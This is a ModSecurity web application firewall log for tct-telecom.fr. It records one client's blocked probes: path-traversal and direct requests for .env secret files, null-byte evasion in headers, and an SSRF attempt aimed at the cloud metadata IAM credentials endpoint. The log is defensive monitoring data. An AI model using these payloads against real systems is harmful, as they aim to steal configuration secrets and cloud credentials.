[Tue May 12 04:50:46.393232 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos3wAAAIg"]
[Tue May 12 04:50:46.393429 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos3wAAAIg"]
[Tue May 12 04:50:46.393492 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos3wAAAIg"]
[Tue May 12 04:50:46.393530 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos3wAAAIg"]
[Tue May 12 04:50:46.393920 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos3wAAAIg"]
[Tue May 12 04:50:46.402237 2026] [core:error] [pid 1808852:tid 1808856] [client 93.123.109.165:29590] AH10244: invalid URI path (/static../../../../.env)
[Tue May 12 04:50:46.414349 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhs1tk6y7yBJLpJos3wAAAIg"]
[Tue May 12 04:50:46.433216 2026] [security2:error] [pid 1730207:tid 1730215] [client 93.123.109.165:7958] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhDue9Sp-pIv_Bb63ywAAAUY"]
[Tue May 12 04:50:46.616068 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos4AAAAIg"]
[Tue May 12 04:50:46.616118 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos4AAAAIg"]
[Tue May 12 04:50:46.616143 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos4AAAAIg"]
[Tue May 12 04:50:46.616345 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos4AAAAIg"]
[Tue May 12 04:50:46.616383 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos4AAAAIg"]
[Tue May 12 04:50:46.616769 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos4AAAAIg"]
[Tue May 12 04:50:46.698218 2026] [security2:error] [pid 1825287:tid 1825323] [client 93.123.109.165:7802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhAgpmE1yW0glLdghhAAAANI"]
[Tue May 12 04:50:46.705328 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhs1tk6y7yBJLpJos4AAAAIg"]
[Tue May 12 04:50:46.743060 2026] [security2:error] [pid 1825287:tid 1825315] [client 93.123.109.165:29632] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVhggpmE1yW0glLdghjAAAAMo"]
[Tue May 12 04:50:46.743254 2026] [security2:error] [pid 1825287:tid 1825315] [client 93.123.109.165:29632] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVhggpmE1yW0glLdghjAAAAMo"]
[Tue May 12 04:50:46.746158 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos4gAAAIg"]
[Tue May 12 04:50:46.746208 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos4gAAAIg"]
[Tue May 12 04:50:46.746233 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos4gAAAIg"]
[Tue May 12 04:50:46.746795 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhs1tk6y7yBJLpJos4gAAAIg"]
[Tue May 12 04:50:46.879566 2026] [security2:error] [pid 1730175:tid 1730185] [client 93.123.109.165:7884] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhHo6NvB9WXx5V-6howAAAQg"]
[Tue May 12 04:50:47.929313 2026] [security2:error] [pid 1808852:tid 1808867] [client 93.123.109.165:29624] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agKVhxfeipD4uoG21FolOwAAAAw"]
[Tue May 12 04:50:47.930065 2026] [security2:error] [pid 1808852:tid 1808867] [client 93.123.109.165:29624] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agKVhxfeipD4uoG21FolOwAAAAw"]
[Tue May 12 04:50:48.058307 2026] [security2:error] [pid 1825287:tid 1825315] [client 93.123.109.165:29632] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhggpmE1yW0glLdghjAAAAMo"]
[Tue May 12 04:50:48.062485 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:29628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhs1tk6y7yBJLpJos4gAAAIg"]
[Tue May 12 04:50:48.408174 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKViDue9Sp-pIv_Bb632AAAAU0"], referer: https://tct-telecom.fr/api/v1/health?X-App-Env=%00
[Tue May 12 04:50:48.408229 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKViDue9Sp-pIv_Bb632AAAAU0"], referer: https://tct-telecom.fr/api/v1/health?X-App-Env=%00
[Tue May 12 04:50:48.408631 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 8)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKViDue9Sp-pIv_Bb632AAAAU0"], referer: https://tct-telecom.fr/api/v1/health?X-App-Env=%00
[Tue May 12 04:50:48.409470 2026] [security2:error] [pid 1825179:tid 1825213] [client 93.123.109.165:29710] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKViNr1yOh9TvizeziSowAAAE8"]
[Tue May 12 04:50:48.409548 2026] [security2:error] [pid 1825179:tid 1825213] [client 93.123.109.165:29710] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKViNr1yOh9TvizeziSowAAAE8"]
[Tue May 12 04:50:48.409659 2026] [security2:error] [pid 1825179:tid 1825213] [client 93.123.109.165:29710] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKViNr1yOh9TvizeziSowAAAE8"]
[Tue May 12 04:50:48.430082 2026] [security2:error] [pid 1808852:tid 1808873] [client 93.123.109.165:29722] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agKViBfeipD4uoG21FolQQAAABI"]
[Tue May 12 04:50:48.430287 2026] [security2:error] [pid 1808852:tid 1808873] [client 93.123.109.165:29722] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agKViBfeipD4uoG21FolQQAAABI"]
[Tue May 12 04:50:48.517476 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKViDue9Sp-pIv_Bb632AAAAU0"], referer: https://tct-telecom.fr/api/v1/health?X-App-Env=%00
[Tue May 12 04:50:48.537886 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb632wAAAU0"]
[Tue May 12 04:50:48.537948 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb632wAAAU0"]
